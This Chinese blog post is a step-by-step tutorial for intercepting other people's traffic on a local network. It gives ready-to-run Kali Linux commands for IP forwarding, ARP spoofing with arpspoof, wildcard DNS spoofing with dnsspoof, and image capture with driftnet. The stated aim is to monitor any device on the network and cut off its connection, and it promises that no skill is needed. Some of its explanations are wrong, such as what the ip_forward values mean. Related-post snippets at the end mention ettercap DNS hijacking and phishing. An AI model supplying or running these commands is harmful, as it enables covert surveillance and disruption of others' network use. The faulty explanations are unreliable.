局域网dns欺骗攻击不能上网_局域网下实现劫持其他人设备

最新推荐文章于 2023-02-16 09:49:42 发布
最新推荐文章于 2023-02-16 09:49:42 发布
阅读量231 收藏
点赞数
文章标签: 局域网dns欺骗攻击不能上网
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39912163/article/details/112559004
版权

使用系统:Kali Linux

免费无毒下载地址:https://www.kali.org/

以下内容是本人的渗透技术学习笔记,由于本篇文章比较敏感,所以这里只列举最基础的劫持手法,感兴趣的各位请自行拓展。

教程全程小白教学,无需掌握任何技术。

教程最终可实现,在局域网下可监控其他在局域网下的任何设备。可以查看对方浏览的网页等等信息,也可以拦截对方的数据包让对象无法联网。教程开始。

1、创建一个名为DNS.txt的文件:

touch DNS.txt

e142df6ee2fcff98db934a84ad7618db.png

2、使用vi命令进入该文件:

vi DNS.txt

00bbd3f74aa04a10cc24c444ea8d249c.png

3、进入文件后是无法输入内容的,按下i键进入insert状态可输入内容。

99054d0b4b8c3a28fc1d20fc352bb5cc.png

4、内容为

kali虚拟机的ip地址 *.*.*

0769bcfad78d2df809403660f6dea779.png

如:192.168.0.101 *.*.*

*.*.*含义为对方要访问的IP地址,这种格式可以监控对方发送的任何地址请求。

5、保存文件:由于当前处于插入状态,按下键盘ESC键(键盘左上角)退出insert状态,然后同时按下shift+:进入命令状态,输入wq保存并退出。

1f7ad11443a9b017c904950b9aa40294.png

注意:如果不能保存文件,可以修改该文件的权限:

chmod a+x DNS.txt

6、打开ARP欺骗:

echo 1 >/proc/sys/net/ipv4/ip_forward

数字1是欺骗,0是攻击,以下列举欺骗流程。

75622d0bb6837f84454d0c3c3c621fac.png

7、执行欺骗:

arpspoof -i eth0 -t 192.168.0.1 -r 目标IP地址

其中eth0是你的网卡。网卡可通过ifconfig命令查看

其中192.168.0.1是网关。

ac314b7cadd82b75cc3c6eba93deddf0.png

8、开启DNS监控:

dnsspoof -i eth0 -f DNS.txt

这里DNS.txt就是刚刚创建的文件路径

现在就已经可以监控目标IP在浏览什么网址或信息。

10b1285e9daaca40cbb0bc7089306c69.png

9、监控目标浏览的图片:driftnet -i eth0

内容仅供学习交流!

weixin_39912163
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
局域网dns欺骗攻击不能上网_局域网霸主之bettercap
weixin_34666478的博客
01-10 747
郑重声明:文中涉及的技术、思路和工具仅以安全为目的学习交流,让大家对网络安全有一个正确的认识,任何人不得将其用于违法犯罪用途,否则后果自行承担!!!过了这么久,我终于回来了,让大家久等了 这段时间更新慢是一方面是本人学生,上课时间紧,另一方面原因疫情影响电脑不在身边,借的电脑带不起来多台虚拟机,所以很多次写到一半,电脑卡主死机了,以至于这么久没更新,不过大...
反arp攻击软件_技术干货透析中间人攻击
weixin_39948111的博客
11-24 217
作者:甜橙安全团队免责声明;下述内容用仅用于技术研究与探讨,禁止任何非法利用,由此造成的后果概不负责,如有侵权请联系版主,我们会及时处理。欢迎各位添加微信号:qinchang_198231 加入安全+ 交流群 和大佬们一起交流安全技术中间人攻击是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“...
局域网dns欺骗攻击不能上网_DNS欺诈,局域网攻击,如何解决?
weixin_35936191的博客
01-17 617
老是受到这种攻击,见附图,攻击者IP不变,而MAC值确是变动的。我怀疑我经常只能上QQ,不能上网就是这个原因引起的,请哪位大侠指点下,追踪不到攻击者,这种攻击局域网内,还是网外...老是受到这种攻击,见附图,攻击者IP不变,而MAC值确是变动的。我怀疑我经常只能上QQ,不能上网就是这个原因引起的,请哪位大侠指点下,追踪不到攻击者,这种攻击局域网内,还是网外,如何解决拦截时间 拦截类型 攻击源I...
Windows 平台下局域网劫持测试工具 – EvilFoca
10-24
EvilFoca是Windows环境下基于.NET FrameWork的一款轻量级的劫持测试工具。与BackTrack和Kali_Linux下复杂的命令相比,EvilFoca更加小巧,轻便,简单,但其效果更加显著高效。
域名劫持
架构师小秘圈
01-25 1860
作者:sarleon 来自:freebuf.com01 原理DNS决定的是我们的域名将解析到哪一个IP地址的记录,是基于UDP协议的一种应用层协议 这个攻击的前提是攻击者掌控了你的网关(可以是路由器,交换机,或者运营商),一般来说,在一个WLAN下面,使用ARP劫持就可以达到此效果。你在访问一个网站的过程中,经历了如下几个阶段: 以访问freebuf的主页为例:1、地址栏输入freebuf.com
DNS.rar_DNS欺骗_dns _dns欺骗winpcap_winpcap dns
09-22
DNS欺骗,又称DNS缓存中毒或DNS劫持,是一种网络安全攻击手法,攻击者通过篡改DNS响应,误导用户访问错误的网站,通常用于钓鱼攻击或数据窃取。这种攻击通常发生在DNS查询和响应的过程中,当攻击者设法让受害者...
局域网下利用dns欺骗进行钓鱼
m0_64342167的博客
02-08 2950
实验材料 kali rtl8812au 靶机一台(手机电脑皆可) 前置工作 1、首先开启流量流量转发,不然开启arp欺骗就是单纯的断网了 2、接下来再去添加你要重定向的dns,该配置文件是/etc/ettercap/etter.dns 3、最后开启一个http服务,部署你的钓鱼网站 前置工作完成后,接下来一把子梭就完事了,打开ettercap 注意这里的网卡别选错了,使用虚拟机自带的网卡转发速度非常慢,要选择无线网卡 接下来扫描添加target,当然是我们的靶机和网关啦 接.
Android中Https通信实现_中间人攻击DNS欺骗和会话劫持
renzhongrui的博客
12-26 1196
上一篇文章记述了在Android中使用Https进行单向认证的配置,但单向认证存在中严重的安全漏洞,其中最容易受到中间人攻击DNS欺骗,本文主要讲述进行中间人攻击DNS欺骗的方式。 概览 中间人攻击 DNS欺骗 ...
2021年局域网DNS劫持实战.docx
11-17
2021年局域网DNS劫持实战.docx
DNS劫持实现
qq_41712727的博客
09-23 300
场景 开启并配置DHCP 开启并配置DNS 外网通信配置
利用netwox工具进行局域网内TCP会话劫持和RST攻击,步骤清晰,过程简洁
weixin_43476621的博客
07-24 3824
开启telnet服务 检查是否安装telnet和xinetd rpm -qa telnet-server rpm -qa xinetd 如果没有安装,则先安装 安装命令 yum install telnet-server yum install xinetd 安装完成后,将xinetd服务和telnet服务加入开机自启动 systemctl enable xinetd.service systemctl enable telnet.socket 启动以上两个服务 systemctl start telnet
DNS劫持
weixin_45597678的博客
11-19 4620
文章目录原理实操复现防御 原理 DNS的全称为Domain Name Server也就是域名服务,在真实环境中我们人是很难记住一串没有规律的ip地址的,所以引入了域名方便人们的记忆和访问但是数据包在网络的传输是以ip地址来寻址的,这就导致需要一种服务来提供从域名到ip的转换,而DNS就是这样一种服务。 这里再介绍一下访问一个网址的时候解析域名会经过哪些步骤吧: 首先会访问我们的本地DNS缓存查看是否有该域名的一个解析记录有的话会取该记录的映射ip进行发送数据包 如果本地DNS缓存没有该域名的解析记录的话,
简单的进行DNS劫持
Dream丶Boy
01-06 5404
在终端输入:vim /etc/ettercap/etter.dns来编辑dns文件,可以删除里面所有的内容,因为都是演示, 可以新增你需要劫持的域名和目标IP,格式和host文件一致 www.baidu.com A 192.168.1.101 上面的www.baidu.com是目标域名,A是解析的方式,后面的IP就是我们的IP。 在终端输入:ettercap -G启动ettercap客户端 选择网卡后点击右上角启动,启动后,左上角点击放大镜进行扫描 然后点击放大镜右边的服务器列表可以看见所有在线的机器,
dns内网劫持dns劫持工具好用的有那些
seven9711的博客
01-06 1897
一、原理 虽然计算机之间通信需要对方的ip,但是最底层的传输是物理层上,传输的是二进制和MAC帧,将ip解析成MAC地址的是ARP缓存表,这个缓存表每个第二层设备及以上都有。 主机A要和主机B通信,知道主机A的ip,但是arp缓存表了没有主机B的MAC地址,于是他会在局域网内广播询问主机B的mac,主机B会应答自己的MAC.(注:因为每个主机的ip是不固定的,所以设备的arp缓存表也要每隔一段时间都会更新,发起广播) 这种工作方式有一个BUG,就是如果主机C不停的应答自己的MAC,主机A广播询问主机B的MA
Kali 局域网 DNS 劫持
qq_56724121的博客
04-23 924
Kali 局域网 DNS 劫持 1. 将kali XP 桥接到物理的无线网卡并且互通 2. 修改 errtercap 的配置文件 => vim /etc/ettercap/etter.dns 3. 启动Apache服务器 service apache2 start 4. 启动 ettercap 图像化界面 => ettercap -G 5.ettercap进行接口设置 ettercap进行攻击目标设置 将扫描到的地址 网关加入t...
【安全工具】内网劫持工具EvilFoca介绍
最新发布
qq_26243045的博客
02-16 1039
在Domain中输入你想要劫持的网站,IP处则输入你指定要让目标访问的IP,如果没有固定的域名要劫持想让所有的域名都被劫持,可以勾选Domain后面的wildcard,这样目标浏览的所有的网站都会解析到你指定的网站上,但是会导致目标的网速变的很慢需要慎重使用。EvilFoca是一款强大的内网攻击工具,拥有ARP劫持,DHCP ACK注入,DNS劫持,Dos攻击,还具有有内网主机发现功能。这时我们打开wireshark筛选数据包,可以发现流量已经经过我们的网卡来传输了,达到攻击目的。
DNS缓存(DNS劫持)攻击过程演示
安全命令
08-01 2742
DNS缓存攻击原理 DNS缓存攻击是通过欺骗域名服务器的缓存条目(即:域名到ip地址的映射)。当目标计算机访问被欺骗的域名时,会把域名转发到一个被我们伪装的站点下。而访问者却并不知道访问的是一个假网站。 当计算机要访问本地或者Internet上的站点时,操作系统首先需要知道该站点的确切IP。但是记住ip是一件困难的事情,所以基本上每个站点都有一个域名。而计算机去访问站点的时候如果拿到的是域名,那么去寻找网络中的一台DNS 服务器,通过该域名服务器提供的域名解析服务将域名转换为真实的ip地址再进行访问大概的流
利用DNS欺骗局域网中挂马
04-16 1193
作者:黑侠(Black Mask)来源:Black Maskblog文章已经发表于>2006年10期,转载请注明!DNS域名欺骗,相信许多朋友都听说过了吧,也经常会听到一些某某大站遭到DNS欺骗攻击,而导致网站不能被用户所正常浏览,那么难道某某大站真的被入侵 了吗?其实情况并不是这样的,他们的网站并没有真正的被入侵,而是他们的域名被所黑客劫持,当用户浏览他们的网站时,发现主页怎么变成其他的内容了
DNS欺骗攻击详细教程之Linux篇
程序媛想事儿
01-13 8334
DNS欺骗即域名信息欺骗是最常见的DNS安全问题。当一个DNS服务器掉入陷阱,使用了来自一个恶意DNS服务器的错误信息,那么该DNS服务器就被欺骗了。DNS欺骗会使那些易受攻击DNS服务器产生许多安全问题,例如:将用户引导到错误的互联网站点,或者发送一个电子邮件到一个未经授权的邮件服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值